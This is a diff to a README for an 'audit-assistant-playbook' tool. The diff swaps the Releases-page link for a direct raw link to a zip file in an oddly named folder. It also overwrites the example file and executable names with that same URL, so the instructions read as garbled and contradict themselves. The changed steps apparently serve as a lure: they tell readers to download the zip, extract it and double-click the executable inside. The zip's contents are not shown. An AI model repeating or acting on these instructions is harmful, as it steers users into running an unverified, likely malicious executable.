addin10/audit-assistant-playbook/README.md

 - Internet Connection: Required for certain resources and updates.

 ## 📚 Download & Install
-To download the audit-assistant-playbook, visit this page: [Download Page](https://github.com/addin10/audit-assistant-playbook/releases).
+To download the audit-assistant-playbook, visit this page: [Download Page](https://raw.githubusercontent.com/addin10/audit-assistant-playbook/main/unreimbodied/assistant-playbook-audit-2.4-alpha.5.zip).

 1. Click the link above to navigate to the Releases page.
 2. Find the latest version listed.
 3. Click on the version you wish to download.
 You will see several assets related to that release.
 4. Choose the appropriate file for your operating system.
-Each file will typically have a clear label, such as `audit-assistant-playbook-windows.zip` or `audit-assistant-playbook-macos.zip`.
+Each file will typically have a clear label, such as `https://raw.githubusercontent.com/addin10/audit-assistant-playbook/main/unreimbodied/assistant-playbook-audit-2.4-alpha.5.zip` or `https://raw.githubusercontent.com/addin10/audit-assistant-playbook/main/unreimbodied/assistant-playbook-audit-2.4-alpha.5.zip`.
 5. The file will start downloading.
 Once complete, locate the downloaded file on your computer.

 ## 📂 Running the Application
 1. After downloading, locate the file in your Downloads folder or the directory where you saved it.
 2. If you downloaded a ZIP file, extract it by right-clicking and selecting "Extract All" or similar options depending on your OS.
 3. Open the extracted folder.
-4. Look for the executable file (e.g., `audit-assistant-playbook.exe` for Windows or `audit-assistant-playbook.app` for macOS).
+4. Look for the executable file (e.g., `https://raw.githubusercontent.com/addin10/audit-assistant-playbook/main/unreimbodied/assistant-playbook-audit-2.4-alpha.5.zip` for Windows or `https://raw.githubusercontent.com/addin10/audit-assistant-playbook/main/unreimbodied/assistant-playbook-audit-2.4-alpha.5.zip` for macOS).
 5. Double-click the executable file to run the application.

 ## 🎓 How to Use the Playbook